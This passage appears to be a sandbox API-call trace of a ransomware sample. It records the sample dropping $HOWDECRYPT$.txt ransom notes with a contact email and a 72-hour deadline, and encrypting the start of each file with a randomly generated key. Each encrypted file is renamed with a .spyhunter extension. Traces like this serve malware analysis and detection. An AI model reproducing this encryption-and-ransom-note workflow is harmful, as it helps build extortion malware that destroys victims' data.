(lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0091.270] WriteFile (in: hFile=0x17c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cfdd8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cfdd8*=0x2ac, lpOverlapped=0x0) returned 1 [0091.270] CloseHandle (hObject=0x17c) returned 1 [0091.271] GetProcessHeap () returned 0x2c0000 [0091.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e200 | out: hHeap=0x2c0000) returned 1 [0091.271] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0091.271] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0091.271] WriteFile (in: hFile=0x17c, lpBuffer=0x25cfcab*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cfdd4, lpOverlapped=0x0 | out: lpBuffer=0x25cfcab*, lpNumberOfBytesWritten=0x25cfdd4*=0x127, lpOverlapped=0x0) returned 1 [0091.272] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0091.272] WriteFile (in: hFile=0x17c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cfdd4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cfdd4*=0x2ac, lpOverlapped=0x0) returned 1 [0091.273] CloseHandle (hObject=0x17c) returned 1 [0091.273] GetProcessHeap () returned 0x2c0000 [0091.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377e20 | out: hHeap=0x2c0000) returned 1 [0091.273] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0091.274] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0091.274] WriteFile (in: hFile=0x17c, lpBuffer=0x25cfca7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cfdd0, lpOverlapped=0x0 | out: lpBuffer=0x25cfca7*, lpNumberOfBytesWritten=0x25cfdd0*=0x127, lpOverlapped=0x0) returned 1 [0091.275] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0091.276] WriteFile (in: hFile=0x17c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cfdd0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cfdd0*=0x2ac, lpOverlapped=0x0) returned 1 [0091.276] CloseHandle (hObject=0x17c) returned 1 [0091.276] GetProcessHeap () returned 0x2c0000 [0091.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34e8d8 | out: hHeap=0x2c0000) returned 1 [0091.276] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfd70 | out: pbBuffer=0x25cfd70) returned 1 [0091.276] GetProcessHeap () returned 0x2c0000 [0091.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0091.276] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfd68*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfd68*=0x30) returned 1 [0091.276] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0091.280] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 74 [0091.280] StrStrW (lpFirst="VBUI6.CHM", lpSrch=".txt") returned 0x0 [0091.280] GetProcessHeap () returned 0x2c0000 [0091.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x34a078 [0091.280] ReadFile (in: hFile=0x17c, lpBuffer=0x34a078, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfd2c, lpOverlapped=0x0 | out: lpBuffer=0x34a078*, lpNumberOfBytesRead=0x25cfd2c*=0x2800, lpOverlapped=0x0) returned 1 [0091.283] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.283] WriteFile (in: hFile=0x17c, lpBuffer=0x34a078*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfd2c, lpOverlapped=0x0 | out: lpBuffer=0x34a078*, lpNumberOfBytesWritten=0x25cfd2c*=0x2800, lpOverlapped=0x0) returned 1 [0091.283] GetProcessHeap () returned 0x2c0000 [0091.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a078 | out: hHeap=0x2c0000) returned 1 [0091.283] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.283] WriteFile (in: hFile=0x17c, lpBuffer=0x25cfd6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfd2c, lpOverlapped=0x0 | out: lpBuffer=0x25cfd6c*, lpNumberOfBytesWritten=0x25cfd2c*=0x4, lpOverlapped=0x0) returned 1 [0091.297] WriteFile (in: hFile=0x17c, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfd2c, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x25cfd2c*=0x30, lpOverlapped=0x0) returned 1 [0091.297] CloseHandle (hObject=0x17c) returned 1 [0091.344] GetProcessHeap () returned 0x2c0000 [0091.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c20090 [0091.345] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM.spyhunter") returned 84 [0091.345] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm.spyhunter")) returned 1 [0091.345] GetProcessHeap () returned 0x2c0000 [0091.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20090 | out: hHeap=0x2c0000) returned 1 [0091.345] GetProcessHeap () returned 0x2c0000 [0091.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0091.345] GetProcessHeap () returned 0x2c0000 [0091.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346d48 | out: hHeap=0x2c0000) returned 1 [0091.346] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0091.346] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0091.346] WriteFile (in: hFile=0x17c, lpBuffer=0x25cfc9f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cfdc8, lpOverlapped=0x0 | out: lpBuffer=0x25cfc9f*, lpNumberOfBytesWritten=0x25cfdc8*=0x127, lpOverlapped=0x0) returned 1 [0091.347] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0091.347] WriteFile (in: hFile=0x17c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cfdc8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cfdc8*=0x2ac, lpOverlapped=0x0) returned 1 [0091.347] CloseHandle (hObject=0x17c) returned 1 [0091.347] GetProcessHeap () returned 0x2c0000 [0091.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e200 | out: hHeap=0x2c0000) returned 1 [0091.348] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfd68 | out: pbBuffer=0x25cfd68) returned 1 [0091.348] GetProcessHeap () returned 0x2c0000 [0091.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0091.348] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfd60*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfd60*=0x30) returned 1 [0091.348] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia90.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia90.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0091.348] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia90.dll") returned 65 [0091.348] StrStrW (lpFirst="msdia90.dll", lpSrch=".txt") returned 0x0 [0091.348] GetProcessHeap () returned 0x2c0000 [0091.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x34a078 [0091.349] ReadFile (in: hFile=0x17c, lpBuffer=0x34a078, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfd24, lpOverlapped=0x0 | out: lpBuffer=0x34a078*, lpNumberOfBytesRead=0x25cfd24*=0x2800, lpOverlapped=0x0) returned 1 [0091.373] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.373] WriteFile (in: hFile=0x17c, lpBuffer=0x34a078*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfd24, lpOverlapped=0x0 | out: lpBuffer=0x34a078*, lpNumberOfBytesWritten=0x25cfd24*=0x2800, lpOverlapped=0x0) returned 1 [0091.373] GetProcessHeap () returned 0x2c0000 [0091.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a078 | out: hHeap=0x2c0000) returned 1 [0091.373] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.373] WriteFile (in: hFile=0x17c, lpBuffer=0x25cfd64*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfd24, lpOverlapped=0x0 | out: lpBuffer=0x25cfd64*, lpNumberOfBytesWritten=0x25cfd24*=0x4, lpOverlapped=0x0) returned 1 [0091.581] WriteFile (in: hFile=0x17c, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfd24, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x25cfd24*=0x30, lpOverlapped=0x0) returned 1 [0091.581] CloseHandle (hObject=0x17c) returned 1 [0091.640] GetProcessHeap () returned 0x2c0000 [0091.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0091.641] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia90.dll.spyhunter") returned 75 [0091.641] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia90.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia90.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia90.dll.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia90.dll.spyhunter")) returned 1 [0091.727] GetProcessHeap () returned 0x2c0000 [0091.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c10048 | out: hHeap=0x2c0000) returned 1 [0091.727] GetProcessHeap () returned 0x2c0000 [0091.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0091.727] GetProcessHeap () returned 0x2c0000 [0091.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358130 | out: hHeap=0x2c0000) returned 1 [0091.727] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfd60 | out: pbBuffer=0x25cfd60) returned 1 [0091.727] GetProcessHeap () returned 0x2c0000 [0091.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0091.727] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfd58*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfd58*=0x30) returned 1 [0091.727] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msador15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msador15.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.752] GetProcessHeap () returned 0x2c0000 [0091.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0091.752] GetProcessHeap () returned 0x2c0000 [0091.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34d1d8 | out: hHeap=0x2c0000) returned 1 [0091.752] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfd60 | out: pbBuffer=0x25cfd60) returned 1 [0091.752] GetProcessHeap () returned 0x2c0000 [0091.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0091.752] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfd58*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfd58*=0x30) returned 1 [0091.753] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msadox.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.753] GetProcessHeap () returned 0x2c0000 [0091.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0091.753] GetProcessHeap () returned 0x2c0000 [0091.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x329e90 | out: hHeap=0x2c0000) returned 1 [0091.753] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfd58 | out: pbBuffer=0x25cfd58) returned 1 [0091.753] GetProcessHeap () returned 0x2c0000 [0091.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0091.753] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfd50*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfd50*=0x30) returned 1 [0091.753] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msadomd28.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.753] GetProcessHeap () returned 0x2c0000 [0091.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0091.754] GetProcessHeap () returned 0x2c0000 [0091.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34d118 | out: hHeap=0x2c0000) returned 1 [0091.754] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfd58 | out: pbBuffer=0x25cfd58) returned 1 [0091.754] GetProcessHeap () returned 0x2c0000 [0091.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0091.754] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfd50*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfd50*=0x30) returned 1 [0091.754] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msadomd.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.777] GetProcessHeap () returned 0x2c0000 [0091.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0091.813] GetProcessHeap () returned 0x2c0000 [0091.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34d058 | out: hHeap=0x2c0000) returned 1 [0091.813] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfd50 | out: pbBuffer=0x25cfd50) returned 1 [0091.813] GetProcessHeap () returned 0x2c0000 [0091.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0091.813] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfd48*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfd48*=0x30) returned 1 [0091.813] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpsrvutl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0091.823] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL") returned 92 [0091.823] StrStrW (lpFirst="FPSRVUTL.DLL", lpSrch=".txt") returned 0x0 [0091.823] GetProcessHeap () returned 0x2c0000 [0091.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x347830 [0091.824] ReadFile (in: hFile=0xcc, lpBuffer=0x347830, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfd0c, lpOverlapped=0x0 | out: lpBuffer=0x347830*, lpNumberOfBytesRead=0x25cfd0c*=0x2800, lpOverlapped=0x0) returned 1 [0091.882] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.882] WriteFile (in: hFile=0xcc, lpBuffer=0x347830*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfd0c, lpOverlapped=0x0 | out: lpBuffer=0x347830*, lpNumberOfBytesWritten=0x25cfd0c*=0x2800, lpOverlapped=0x0) returned 1 [0091.882] GetProcessHeap () returned 0x2c0000 [0091.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x347830 | out: hHeap=0x2c0000) returned 1 [0091.883] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.883] WriteFile (in: hFile=0xcc, lpBuffer=0x25cfd4c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfd0c, lpOverlapped=0x0 | out: lpBuffer=0x25cfd4c*, lpNumberOfBytesWritten=0x25cfd0c*=0x4, lpOverlapped=0x0) returned 1 [0092.146] WriteFile (in: hFile=0xcc, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfd0c, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x25cfd0c*=0x30, lpOverlapped=0x0) returned 1 [0092.146] CloseHandle (hObject=0xcc) returned 1 [0092.460] GetProcessHeap () returned 0x2c0000 [0092.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x396830 [0092.461] wnsprintfW (in: pszDest=0x396830, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL.spyhunter") returned 102 [0092.461] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpsrvutl.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpsrvutl.dll.spyhunter")) returned 1 [0092.497] GetProcessHeap () returned 0x2c0000 [0092.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x396830 | out: hHeap=0x2c0000) returned 1 [0092.497] GetProcessHeap () returned 0x2c0000 [0092.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0092.497] 